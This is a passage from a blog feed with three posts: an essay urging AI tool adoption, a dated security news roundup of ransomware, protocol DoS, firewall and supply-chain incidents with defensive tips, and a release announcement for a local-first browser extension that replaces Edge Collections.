class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><h3>The Productivity Gap Is Already Massive</h3><p>People who use AI tools well aren&#8217;t just &#8220;a little faster.&#8221; They&#8217;re operating at an entirely different level.</p><p>A writer using Claude or Grok can brainstorm, outline, research angles, and draft in a fraction of the time it takes someone staring at a blank page. A marketer can generate dozens of ad variations, test them, and iterate before their competitor finishes the first one. A student or lifelong learner can get personalized explanations, code reviews, or deep dives into any topic 24/7.</p><p>Recent data shows professionals using AI complete tasks 20-40% faster on average, with even higher gains in creative and analytical work. That&#8217;s not hype. That&#8217;s compounding advantage. Over months and years, the person who refuses AI falls further behind. Their output looks dated. Their ideas feel stale. Their resume looks thin.</p><h3>&#8220;It&#8217;s Not Creative&#8221; Is Copium</h3><p>The most common objection is &#8220;AI has no soul&#8221; or &#8220;real artists don&#8217;t use it.&#8221; Tell that to the photographers who embraced digital cameras, the musicians who use Auto-Tune and digital audio workstations, or the filmmakers who rely on CGI.</p><p>AI isn&#8217;t replacing human creativity. It&#8217;s amplifying it. It&#8217;s the best research assistant, idea sparring partner, and first-draft generator humanity has ever built. The people producing the most original work right now are usually the ones who know how to direct AI effectively, then apply their own taste, judgment, and lived experience on top.</p><p>Refusing the tool doesn&#8217;t make you more authentic. It just means you&#8217;re doing everything the hard way while others combine human insight with machine scale.</p><h3>The Job Market Doesn&#8217;t Care About Your Principles</h3><p>Employers aren&#8217;t asking &#8220;Do you use AI?&#8221; in interviews anymore. They&#8217;re assuming you do and measuring how well.</p><p>If two candidates apply for the same role and one can leverage AI to produce better work faster, the choice is obvious. Companies adopting AI are seeing real ROI. Those that don&#8217;t are losing talent and market share.</p><p>This isn&#8217;t just true for tech jobs. Lawyers summarizing case law, doctors staying current with research, teachers creating lesson plans, accountants handling compliance, mechanics diagnosing vehicles: AI is touching nearly every field. The workers who treat it as a superpower will outpace those who treat it as a threat.</p><h3>You&#8217;re Already Using It (Whether You Admit It or Not)</h3><p>Search engines use AI ranking. Your phone&#8217;s autocorrect and predictive text are AI. Netflix recommendations, spam filters, GPS routing, even the fraud detection on your credit card: all AI.</p><p>Pretending you&#8217;re &#8220;opting out&#8221; while benefiting from the underlying infrastructure is just self-deception. The question isn&#8217;t whether AI will be part of your life. It already is. The real question is whether you&#8217;ll be a passive consumer or an active, skilled user.</p><h3>The Real Risks of Avoidance</h3><ul><li><p><strong>Stagnation</strong>: Skills atrophy when you refuse new tools.</p></li><li><p><strong>Isolation</strong>: You miss out on the new ways people collaborate and create.</p></li><li><p><strong>Economic disadvantage</strong>: Higher effort for lower output in a world that rewards leverage.</p></li><li><p><strong>Blind spots</strong>: You won&#8217;t understand the technology shaping policy, culture, and the economy.</p></li></ul><p>None of this means you have to worship AI or ignore its risks. Bias, hallucinations, energy costs, job displacement in certain sectors, and intellectual property questions are all real and worth serious discussion. But ignoring the tool because of its flaws is like refusing to drive cars because of traffic accidents.</p><h3>Start Small, Get Good Fast</h3><p>You don&#8217;t need to go all-in. Try this:</p><ol><li><p>Pick one task you do regularly (writing emails, researching topics, brainstorming ideas, analyzing data).</p></li><li><p>Use a free tool (Grok, Claude, ChatGPT, Gemini) and see what it produces.</p></li><li><p>Edit the output ruthlessly with your own expertise.</p></li><li><p>Repeat until it becomes natural.</p></li></ol><p>The learning curve is gentler than you think. Within a few weeks, most people wonder how they ever worked without it.</p><h3>The Future Belongs to the Augmented</h3><p>The age of pure human labor and pure machine labor is ending. The winners will be the human + AI teams that combine the best of both.</p><p>You can scoff if you want. You can cling to romantic notions of &#8220;doing it the old way.&#8221; But the world is moving forward, and it&#8217;s not waiting for permission.</p><p>AI isn&#8217;t a fad. It&#8217;s the new baseline.</p><p>Avoid it at your own risk.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Security Check-in Quick Hits: Gentlemen Ransomware Surge, HTTP/2 Bomb DoS, PAN-OS Exploits, Supply Chain Attacks & Healthcare Breaches]]></title><description><![CDATA[For June 3, 2026]]></description><link>https://rodtrent.substack.com/p/security-check-in-quick-hits-gentlemen</link><guid isPermaLink="false">https://rodtrent.substack.com/p/security-check-in-quick-hits-gentlemen</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Wed, 03 Jun 2026 18:01:07 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!fhdx!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fhdx!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fhdx!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!fhdx!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!fhdx!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!fhdx!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fhdx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg" width="1248" height="832" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:832,&quot;width&quot;:1248,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:291427,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200437549?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fhdx!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!fhdx!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!fhdx!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!fhdx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb55ef40e-e96a-4a69-91bd-e6e18ea8d344_1248x832.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>The Gentlemen Ransomware Explodes in Activity</h3><p>The Gentlemen ransomware operation showed dramatic growth in Q1 2026, with victim claims jumping from 35 in Q4 2025 to 182. Independent analysis by Check Point revealed over 1,570 victims in live command-and-control infrastructure&#8212;far exceeding public claims&#8212;with a generous 90% affiliate payout model.</p><p><strong>Key concerns</strong>: No ethical boundaries, with healthcare heavily targeted alongside manufacturing and tech. The group exploits ESXi environments aggressively. This highlights the ongoing professionalization of ransomware-as-a-service (RaaS) models, where high payouts attract more affiliates and accelerate attacks.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p><strong>Takeaways for organizations</strong>:</p><ul><li><p>Prioritize offline, immutable backups with tested recovery processes.</p></li><li><p>Segment networks, especially for critical sectors like healthcare.</p></li><li><p>Monitor for ESXi-specific indicators of compromise.</p></li></ul><p>Organizations in regulated industries should treat this as an urgent signal to review ransomware playbooks.</p><h3>HTTP/2 Bomb Attack Emerges as a Potent DoS Threat</h3><p>A new &#8220;HTTP/2 Bomb&#8221; attack can exhaust server memory in seconds by exploiting protocol weaknesses, turning relatively low-effort requests into severe resource consumption.</p><p>This denial-of-service technique joins a growing list of protocol-level attacks that bypass traditional rate-limiting. It affects servers handling HTTP/2 traffic without proper safeguards.</p><p><strong>Mitigation steps</strong>:</p><ul><li><p>Update web servers and load balancers to latest stable versions with HTTP/2 mitigations.</p></li><li><p>Implement robust resource limits and monitoring for anomalous connection patterns.</p></li><li><p>Consider WAF rules or cloud protections tuned for protocol abuse.</p></li></ul><p>As web infrastructure remains a prime target, defenders must stay ahead of these evolving low-and-slow (or fast-crash) techniques.</p><h3>Active Exploitation of PAN-OS and Related Network Vulnerabilities</h3><p>Palo Alto Networks customers face urgent risks from active exploitation of a PAN-OS firewall flaw (CVE-2026-0257), enabling login bypasses. This ties into broader concerns around perimeter devices becoming high-value targets.</p><p>Simultaneously, Windows Netlogon flaws are pulling domain controllers deeper into the attack blast radius. These developments underscore the danger of unpatched edge and identity infrastructure.</p><p><strong>Action items</strong>:</p><ul><li><p>Apply Palo Alto patches immediately and review exposure.</p></li><li><p>Harden domain controllers with latest Microsoft updates and monitoring.</p></li><li><p>Adopt zero-trust principles to limit lateral movement if perimeters fail.</p></li></ul><h3>Supply Chain and Developer Ecosystem Compromises</h3><p>Red Hat npm packages were compromised to steal developer credentials and cloud keys, adding to ongoing supply chain risks. Broader reports also highlight WordPress/Magento plugin attacks and container misconfigurations (Docker/Kubernetes) leading to host compromises.</p><p><strong>Broader context</strong>: AI model backdoor research shows threats that remain hidden until model customization, while location data and mobile banking malware continue evolving.</p><p><strong>Recommendations</strong>:</p><ul><li><p>Implement software bill of materials (SBOM) and dependency scanning.</p></li><li><p>Use code signing, isolated build environments, and least-privilege for CI/CD.</p></li><li><p>Verify updates through multiple channels before deployment.</p></li></ul><h3>Healthcare Breaches and Ongoing ICS/OT Concerns</h3><p>Kill Security claimed a breach of Ace Hospital in India, exposing patient records and medical data. Separately, a Dutch organization (katholiekamersfoort.nl) faced a claimed data exposure involving donor/staff PII.</p><p>CISA also released updated ICS advisories, emphasizing persistent vulnerabilities in critical infrastructure.</p><p><strong>Defensive posture</strong>:</p><ul><li><p>Accelerate segmentation and air-gapping where possible in OT environments.</p></li><li><p>Encrypt sensitive health data at rest and in transit.</p></li><li><p>Prepare incident response plans tailored to patient data regulations.</p></li></ul><p><strong>Overall Outlook</strong>: The last 24 hours reflect a threat landscape dominated by ransomware maturation, protocol exploits, and supply chain persistence. Organizations should focus on rapid patching, resilient backups, and proactive threat hunting. Stay vigilant&#8212;cyber threats rarely pause.</p><p></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Collections Plus 1.1: It Grew Into a Power Tool (and Still Keeps Your Data on Your Machine)]]></title><description><![CDATA[Open replacement for the retiring Microsoft Edge Collections now has folders, search, checklists, real Excel export, offline image caching, cross-device sync, a recoverable Trash and Archive, and more]]></description><link>https://rodtrent.substack.com/p/collections-plus-11-it-grew-into</link><guid isPermaLink="false">https://rodtrent.substack.com/p/collections-plus-11-it-grew-into</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Wed, 03 Jun 2026 15:01:56 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!0aH8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0aH8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0aH8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png 424w, https://substackcdn.com/image/fetch/$s_!0aH8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png 848w, https://substackcdn.com/image/fetch/$s_!0aH8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png 1272w, https://substackcdn.com/image/fetch/$s_!0aH8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0aH8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png" width="1280" height="800" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:1280,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:95436,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200162956?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0aH8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png 424w, https://substackcdn.com/image/fetch/$s_!0aH8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png 848w, https://substackcdn.com/image/fetch/$s_!0aH8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png 1272w, https://substackcdn.com/image/fetch/$s_!0aH8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19b4afd2-a3df-4b48-94e5-e7e06966afd9_1280x800.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>If you&#8217;ve been following along, you know the backstory: Microsoft is <strong>retiring Edge Collections</strong> in Edge 149 (around June 2026). I <em>use</em> Collections. It&#8217;s the quiet little feature I lean on for research, shopping lists, trip planning, and the eleven tabs I swear I&#8217;ll read later. So, when I heard it was going away, I built my own open replacement and gave it away.</p><p>That project is <strong>Collections Plus</strong>, a small, local-first browser extension for Chrome and Edge. No account. No server. No build step. Your data lives in your browser, full stop.</p><div class="pullquote"><p><strong><a href="https://chromewebstore.google.com/detail/collections-plus/eekpoobgfoollcmobjeeahonpbjjghia">Install Collections Plus from the Chrome Web Store</a></strong></p></div><p>The first release covered the basics plus Excel export, custom covers, and cross-device sync. Since then, it&#8217;s grown into something genuinely more capable than the thing it replaces. Here&#8217;s the whole tour.</p><h2><strong>Find and organize anything</strong></h2><p>Once you have more than a handful of collections, finding things matters.</p><ul><li><p><strong>Search</strong> across everything (titles, URLs, notes, and tags) from one box at the top.</p></li><li><p><strong>Folders</strong> group related collections under collapsible headers. Hit <strong>+&#128193;</strong>, then use each card&#8217;s <strong>&#128193;</strong> button to file it away.</p></li><li><p><strong>Pin</strong> your favorites so they float to the top of the list.</p></li><li><p><strong>Tags</strong> label collections, and clicking a tag instantly filters the list to it.</p></li></ul><p>Drag-and-drop works on both the items inside a collection <em>and</em> the collections themselves. Grab the <strong>&#10303;</strong> handle and drop where it belongs.</p><h2><strong>Turn any collection into a real list</strong></h2><p>This is my favorite addition, because it changes what a collection <em>is</em>.</p><ul><li><p><strong>Checkboxes:</strong> every item has one. Suddenly a collection is a shopping list, a reading list, a packing list, a parts list you can tick off.</p></li><li><p><strong>Custom fields:</strong> add your own columns like <strong>Price</strong>, <strong>Qty</strong>, or <strong>SKU</strong> to any saved page or image. They&#8217;re not just notes; they&#8217;re structured data&#8230;</p></li></ul><p>&#8230;which matters because of the next part.</p><h2><strong>Get your data out, properly</strong></h2><ul><li><p><strong>Real Excel (</strong><code>.xlsx</code><strong>)</strong> export now, not just CSV. One sheet per collection, a bold header row, and <strong>clickable links</strong>. Those custom fields you added? They become columns. I wrote the <code>.xlsx</code> writer from scratch so it stays dependency-free (no bloat).</p></li><li><p><strong>CSV</strong> is still there for quick sorting and totaling.</p></li><li><p><strong>Markdown</strong> and <strong>HTML</strong> export, too. Drop a collection straight into your notes, a blog post, or a wiki. (The Markdown uses real task-list checkboxes.)</p></li><li><p><strong>Copy links</strong> puts a clean list of titles and their URLs on your clipboard in one click.</p></li></ul><p>A collection is often secretly a list or a dataset. Now you can treat it like one.</p><h2><strong>Capture faster</strong></h2><ul><li><p><strong>Keyboard shortcut:</strong> <code>Ctrl+Shift+S</code> saves the current page without touching the mouse (rebindable in your browser&#8217;s shortcuts page).</p></li><li><p><strong>Add all open tabs:</strong> corral an entire window of &#8220;I&#8217;ll read this later&#8221; into a collection at once.</p></li><li><p><strong>Drag a link or image</strong> straight onto the panel to save it.</p></li><li><p><strong>No more duplicates:</strong> saving a page that&#8217;s already in the collection is skipped.</p></li><li><p><strong>Local screenshots:</strong> when a page has no preview image, Collections Plus grabs a screenshot for the thumbnail, so your list still looks like something.</p></li></ul><h2><strong>Never lose anything</strong></h2><ul><li><p><strong>Offline image caching</strong> (optional): turn it on and saved images are downscaled and stored <em>inside</em> the extension, so they survive the original page going offline. This was the one genuinely fragile thing in the old version; now it&#8217;s a switch.</p></li><li><p><strong>Undo:</strong> deleted a collection or item by mistake? The toast has an <strong>Undo</strong> button.</p></li><li><p><strong>Trash, not gone:</strong> deleting a collection or folder now sends it to a <strong>&#128465; Trash</strong> at the top of the panel instead of vaporizing it. Restore anything, delete one for good, or empty the whole bin &#8212; and whatever you leave behind is purged automatically after 30 days. (Restore a trashed folder and it even re-adopts the collections it used to hold.)</p></li><li><p><strong>Archive the clutter:</strong> got collections you don&#8217;t need underfoot but don&#8217;t want to delete? <strong>&#128230; Archive</strong> tucks them out of your main list, fully intact, until you restore them. Nothing in the Archive is ever auto-deleted.</p></li><li><p><strong>Version history:</strong> Collections Plus quietly keeps recent snapshots you can roll back to from &#8943; &#8594; <em>Version history&#8230;</em>.</p></li><li><p><strong>JSON backup:</strong> a complete, high-fidelity export whenever you want one.</p></li></ul><p>Trash and Archive ride along with cross-device sync and JSON backups, so they&#8217;re consistent everywhere your collections are.</p><h2><strong>A couple of nice touches</strong></h2><ul><li><p><strong>Custom covers:</strong> upload your own image or promote any saved thumbnail with <strong>&#9733;</strong>. A wall of well-chosen covers makes a big list actually scannable.</p></li><li><p><strong>Light or dark theme:</strong> your call.</p></li><li><p><strong>Cleaner dialogs:</strong> prompts and confirmations now show up as tidy in-panel dialogs that match the UI, instead of the browser&#8217;s generic &#8220;the extension says&#8230;&#8221; pop-ups.</p></li></ul><h2><strong>Cross-device sync, without handing your data to anyone</strong></h2><p>This is the feature I&#8217;m proudest of, because of <em>how</em> it works. Most sync wants you to log into someone&#8217;s cloud. I didn&#8217;t want to build that, and I didn&#8217;t want to <em>be</em> that: another company holding your bookmarks.</p><p>So Collections Plus syncs a different way: <strong>provider-agnostic and account-free.</strong> Instead of integrating with OneDrive <em>or</em> Google Drive <em>or</em> Dropbox, it reads and writes a <strong>single file</strong>, <code>collections-sync.json</code>, that <em>you</em> drop into a folder your computer already keeps synced. Your existing cloud client does the actual syncing; the extension just keeps that one file current.</p><p>Setting it up:</p><ol><li><p>First device: &#8943; &#8594; <strong>Create sync file&#8230;</strong> and save <code>collections-sync.json</code> in your synced folder.</p></li><li><p>Other devices: &#8943; &#8594; <strong>Use existing sync file&#8230;</strong> and open that same file once the cloud has downloaded it.</p></li></ol><p>From there it&#8217;s hands-off. Your edits write out automatically, and an open panel pulls in changes from your other devices on focus and every ~20 seconds. It reconciles with a simple <strong>last-edit-wins</strong> rule, judged by the file&#8217;s timestamp <em>as each device sees it locally</em>, so mismatched computer clocks can&#8217;t make a real change look &#8220;old&#8221; and skip it.</p><p>And it&#8217;s gotten smarter since launch:</p><ul><li><p>A <strong>conflict guard:</strong> if a device has un-pushed edits when the file changes elsewhere, it won&#8217;t silently overwrite your work. It keeps your changes and offers <em>&#8220;Use file instead.&#8221;</em></p></li><li><p>The menu shows <strong>when you last synced</strong>, and version history is your rollback net.</p></li><li><p>After a browser restart, the browser drops the file&#8217;s write permission (a security rule), so sync <strong>pauses</strong> and offers a one-click <strong>Resume</strong> rather than failing quietly. Nothing is lost; your changes write out the moment you resume.</p></li></ul><p>The best part: <strong>I never see your data, and neither does any server I run. There is no server I run.</strong> The sync file lives in a folder you chose, touched only by a cloud client you already trust.</p><blockquote><p>Sync uses the browser&#8217;s File System Access API (Chrome and Edge have it). If your browser doesn&#8217;t, the menu says so and everything else works unchanged.</p></blockquote><h2><strong>Still local-first, still yours</strong></h2><p>None of this changes the core promise. Everything is stored locally in your browser. Nothing is sent to me. Sync and image caching are both <strong>off until you turn them on</strong>, and sync points at a file <em>you</em> control. No account, no telemetry, no nonsense.</p><h2><strong>How to get it</strong></h2><p>It&#8217;s free and open source (MIT).</p><p><strong>Chrome Web Store:</strong> Collections Plus is <strong>live</strong>. One click, and it auto-updates from then on.</p><div class="pullquote"><p><strong><a href="https://chromewebstore.google.com/detail/collections-plus/eekpoobgfoollcmobjeeahonpbjjghia">Install Collections Plus from the Chrome Web Store</a></strong></p></div><p><strong>Prefer to load it yourself?</strong> You can still load it as an unpacked extension:</p><ol><li><p>Open <code>edge://extensions</code> (or <code>chrome://extensions</code>).</p></li><li><p>Turn on <strong>Developer mode</strong>.</p></li><li><p>Click <strong>Load unpacked</strong> and select the project folder.</p></li><li><p>Pin the <strong>Collections Plus</strong> icon and click it.</p></li></ol><p><strong>Get the unpacked extension from the GitHub repository: 